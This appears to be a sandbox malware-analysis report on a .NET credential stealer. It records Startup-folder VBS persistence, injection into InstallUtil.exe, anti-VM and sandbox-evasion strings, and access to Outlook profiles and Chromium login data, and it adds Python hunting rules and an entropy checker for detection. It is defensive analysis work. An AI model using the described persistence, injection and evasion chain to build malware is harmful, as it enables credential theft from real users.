Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
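The behaviour lines above describe one chain: the sample drops Activator.vbs into the user's Startup folder, wscript.exe runs that script at logon, the script launches Activator.exe from %APPDATA%, and both the original sample and Activator.exe spawn InstallUtil.exe with no arguments (a .NET utility with nothing to install, i.e. a host for the injected payload), after which InstallUtil.exe opens the Outlook profile key and carries the Chromium Login Data schema in memory. The Task Scheduler API hits come from the bundled Microsoft.Win32.TaskScheduler library named in the pdb path, and no task registration appears in the behaviour lines, so the observed persistence is the Startup-folder script, not a scheduled task. The Python below is an added example, not Joe Sandbox code or output: it encodes those observations as hunting rules and runs them over constructed, sandbox-style events mirroring the process tree. The Event type, the rule names, the benign control events and the PIDs other than 6708 and 7328 are assumptions (6996 is assumed to be the first InstallUtil.exe instance), and the Startup-folder rule is generalised from .vbs to the other script types wscript/cscript/cmd run.

```python
"""Hunting rules for the behaviour chain in this report, run over constructed
sandbox-style events. Added example: neither Joe Sandbox code nor its log format."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str              # "process_create" | "file_create" | "registry_open"
    pid: int
    image: str             # full path of the acting process
    ppid: int = 0          # process_create only
    parent_image: str = ""
    command_line: str = ""
    target: str = ""       # file path or registry key for file/registry events


STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Generalised beyond the .vbs seen here to the other script types wscript/cscript/cmd run.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)$", re.I)
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)|Windows\\Temp|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Well-known Outlook profile subkey (HKCU\...\Outlook\Profiles\<profile>\<guid>) holding account settings.
OUTLOOK_PROFILE_GUID = "9375cff0413111d3b88a00104b2a6676"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def argless(command_line: str, image: str) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    return command_line.strip().strip('"').strip().lower() == image.lower()


def check(ev: Event) -> list:
    """Stateless per-event rules; returns the names of the rules that fire."""
    hits = []
    img = basename(ev.image)
    if ev.kind == "file_create":
        if STARTUP_DIR.search(ev.target) and SCRIPT_EXT.search(ev.target):
            hits.append("script_dropped_in_startup_folder")
    elif ev.kind == "process_create":
        if img in SCRIPT_HOSTS and STARTUP_DIR.search(ev.command_line):
            hits.append("script_host_runs_startup_script")
        if basename(ev.parent_image) in SCRIPT_HOSTS and USER_WRITABLE.search(ev.image):
            hits.append("script_host_launches_exe_from_user_path")
        # InstallUtil.exe with no arguments has nothing to install: a classic injection host.
        if img == "installutil.exe" and argless(ev.command_line, ev.image) \
                and USER_WRITABLE.search(ev.parent_image):
            hits.append("argless_installutil_from_user_path_parent")
    elif ev.kind == "registry_open":
        if OUTLOOK_PROFILE_GUID in ev.target.lower() and img != "outlook.exe":
            hits.append("non_outlook_process_opens_outlook_profile")
    return hits


def find_injection_chains(events: list) -> list:
    """Stateful rule: from each InstallUtil.exe start, walk ppid links back through
    an executable in a user-writable path to a script host. Returns pid triples."""
    procs = {e.pid: e for e in events if e.kind == "process_create"}
    chains = []
    for e in procs.values():
        if basename(e.image) != "installutil.exe":
            continue
        parent = procs.get(e.ppid)
        if parent and USER_WRITABLE.search(parent.image):
            grand = procs.get(parent.ppid)
            if grand and basename(grand.image) in SCRIPT_HOSTS:
                chains.append((grand.pid, parent.pid, e.pid))
    return chains


def scan(events: list) -> dict:
    """Map event index -> rule names for every event that fires at least one rule."""
    return {i: h for i, e in enumerate(events) if (h := check(e))}


INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
STARTUP_VBS = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
# Constructed events mirroring the report's process tree. PIDs 6708/7328 are the
# report's; 6996 is assumed to be the first InstallUtil instance; the rest are invented.
SAMPLE_EVENTS = [
    Event("process_create", 6708, r"C:\Users\user\Desktop\TtLlwb3ava.exe", 4000,
          r"C:\Windows\explorer.exe", r'"C:\Users\user\Desktop\TtLlwb3ava.exe"'),
    Event("file_create", 6708, r"C:\Users\user\Desktop\TtLlwb3ava.exe", target=STARTUP_VBS),
    Event("process_create", 6996, INSTALLUTIL, 6708, r"C:\Users\user\Desktop\TtLlwb3ava.exe",
          f'"{INSTALLUTIL}"'),
    Event("registry_open", 6996, INSTALLUTIL, target=r"HKEY_CURRENT_USER\Software\Microsoft\Office"
          r"\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    Event("process_create", 7100, r"C:\Windows\System32\wscript.exe", 4000, r"C:\Windows\explorer.exe",
          f'"C:\\Windows\\System32\\WScript.exe" "{STARTUP_VBS}"'),
    Event("process_create", 7328, r"C:\Users\user\AppData\Roaming\Activator.exe", 7100,
          r"C:\Windows\System32\wscript.exe", r'"C:\Users\user\AppData\Roaming\Activator.exe" '),
    Event("process_create", 7400, INSTALLUTIL, 7328, r"C:\Users\user\AppData\Roaming\Activator.exe",
          f'"{INSTALLUTIL}"'),
    # Benign controls: an installer using InstallUtil with arguments; Outlook reading its own profile.
    Event("process_create", 7500, INSTALLUTIL, 7499, r"C:\Program Files\Vendor\setup.exe",
          f'"{INSTALLUTIL}" /i Service.exe'),
    Event("registry_open", 7600, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          target=r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"
          r"\9375CFF0413111d3B88A00104B2A6676"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i].image), hits)
    print("injection chains (script host pid, dropped exe pid, InstallUtil pid):",
          find_injection_chains(SAMPLE_EVENTS))
```

Run as a script to print the firing rules and the recovered chain; to use it on real telemetry, map Sysmon event 1 (process create) and 11 (file create) onto Event. Sysmon does not log registry key opens (only create, delete and value-set), so the Outlook-profile rule needs EDR or sandbox telemetry; on the benign controls, InstallUtil.exe launched with arguments from a Program Files installer and Outlook reading its own profile key do not fire.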

                    Data Obfuscation

Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: Yara match | File source: 0.2.TtLlwb3ava.exe.5380000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TtLlwb3ava.exe.5380000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1246431997.0000000005380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_01034EA4 push esi; retf 0_2_01034EA5
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_0532D629 push ebx; retf 0_2_0532D62A
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_0532D208 pushfd ; retf 0_2_0532D451
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_05339AC5 push esi; iretd 0_2_05339AC6
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_055B5D5B push eax; retf 0_2_055B5D61
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_055B5D58 pushad ; retf 0_2_055B5D59
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Code function: 0_2_05616902 push ebp; retf 0_2_05616908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_04A8A5B0 push ds; retf 2_2_04A8A642
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_04A8A6DB push ds; retf 2_2_04A8A6E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_04A8A650 push ds; retf 2_2_04A8A6DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_04A89259 push cs; retf 2_2_04A8925A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_04A8925B push cs; retf 2_2_04A89262
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_018C4EA4 push esi; retf 10_2_018C4EA5
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_05E4D629 push ebx; retf 10_2_05E4D62A
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_05E4D208 pushfd ; retf 10_2_05E4D451
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_05E79AC5 push esi; iretd 10_2_05E79AC6
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060FB375 push edx; ret 10_2_060FB393
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060FB395 push edx; ret 10_2_060FB39B
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060FAEFF push edi; ret 10_2_060FAF01
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060F5D5B push eax; retf 10_2_060F5D61
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060F5D58 pushad ; retf 10_2_060F5D59
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060F1DCB push es; iretd 10_2_060F1DCC
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_06156902 push ebp; retf 10_2_06156908
                    Source: TtLlwb3ava.exe | Static PE information: section name: .text entropy: 7.513094425002416
                    Source: Activator.exe.0.dr | Static PE information: section name: .text entropy: 7.513094425002416
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | File created: C:\Users\user\AppData\Roaming\Activator.exe
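
                    Editor's note on the Data Obfuscation block: the strongest static indicator above is the .text entropy of 7.51, which is the range of compressed or encrypted payload rather than compiled code (both the sample and the dropped Activator.exe report the identical value, consistent with the dropped file being a copy of the sample). The "potential unpacker" hits on ReflectionHelper.cs / XmlSerializationHelper.cs carry file names matching the bundled TaskScheduler library whose PDB path appears above, so on their own they are weak evidence. The following is an added example, not Joe Sandbox or sample code: it reproduces the section-entropy measurement over a constructed, non-loadable PE skeleton with one high-entropy and one low-entropy section. The 7.0 cut-off is an assumed working threshold, not a value from the report.

```python
"""Per-section Shannon entropy for the packing heuristic flagged above (added example)."""
import hashlib
import math
import struct
from collections import Counter

PACKED_THRESHOLD = 7.0  # assumed cut-off; the 7.51 reported for .text above is well past it


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for a uniform byte stream."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_entropies(pe: bytes) -> list:
    """Walk the PE section table and return (name, raw_size, entropy) per section.

    Parses only what is needed to reach the table: e_lfanew from the DOS header, the PE
    signature, NumberOfSections and SizeOfOptionalHeader from the COFF header, then the
    40-byte IMAGE_SECTION_HEADER entries (SizeOfRawData / PointerToRawData at offset 16).
    """
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    result = []
    for i in range(n_sections):
        hdr = table + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        result.append((name, raw_size, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return result


def packed_sections(pe: bytes, threshold: float = PACKED_THRESHOLD) -> list:
    """Names of non-empty sections whose entropy exceeds the threshold."""
    return [name for name, size, ent in section_entropies(pe) if size and ent > threshold]


def build_toy_pe(sections: list) -> bytes:
    """Constructed PE skeleton: DOS header, COFF header with no optional header, section table, raw data.

    Enough for the parser above; it is not loadable and a real file also has an optional header.
    """
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    raw_ptr = 0x40 + 4 + 20 + 40 * len(sections)
    headers, blobs = b"", b""
    for name, data in sections:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, then 16 zero bytes
        headers += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0x1000, len(data), raw_ptr) + b"\0" * 16
        raw_ptr += len(data)
        blobs += data
    return dos + b"PE\0\0" + coff + headers + blobs


def high_entropy_blob(n_blocks: int = 128) -> bytes:
    """Deterministic stand-in for an encrypted payload: SHA-256 of a counter, 32 bytes per block."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n_blocks))


# Constructed sample: encrypted-looking .text beside a .rsrc of 16 repeating byte values (exactly 4.0 bits).
TOY_PE = build_toy_pe([(b".text", high_entropy_blob()), (b".rsrc", bytes(range(16)) * 256)])

if __name__ == "__main__":
    for name, size, ent in section_entropies(TOY_PE):
        print(f"{name:8s} {size:6d} bytes  entropy {ent:.3f}")
    print("packed-looking sections:", packed_sections(TOY_PE))
```

Point `section_entropies` at the bytes of a real sample to get the same per-section numbers the report's static PE pass produces; a .text section above roughly 7.0 bits per byte is a payload waiting to be unpacked, not instructions.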

                    Boot Survival

                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs (3 events)
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Process information set: NOOPENFILEERRORBOX (34 identical events)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (59 identical events)
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical events)
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Process information set: NOOPENFILEERRORBOX (32 identical events)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (57 identical events)

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Memory allocated: FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Memory allocated: 2970000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Memory allocated: 4970000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 4560000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory allocated: 18C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory allocated: 35A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory allocated: 32D0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2FE0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3070000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 5070000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 1238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 1177
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 514
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 966
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99865s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7324; Thread sleep count: 1238 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99734s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99623s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99473s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7324; Thread sleep count: 1177 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99233s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99124s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -99014s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -98906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -98768s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -98640s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -98530s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7528; Thread sleep count: 514 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99843s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99697s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99583s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7528; Thread sleep count: 966 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99318s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -99125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -98989s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -98859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99865
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99623
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99473
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99233
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99014
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99697
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99583
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 99125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98989
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477
                    Source: Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: wscript.exe, 00000009.00000002.1366030798.000001E60ED34000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000002.00000002.2470166984.0000000000872000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2470235476.0000000001337000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F7D008
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe"
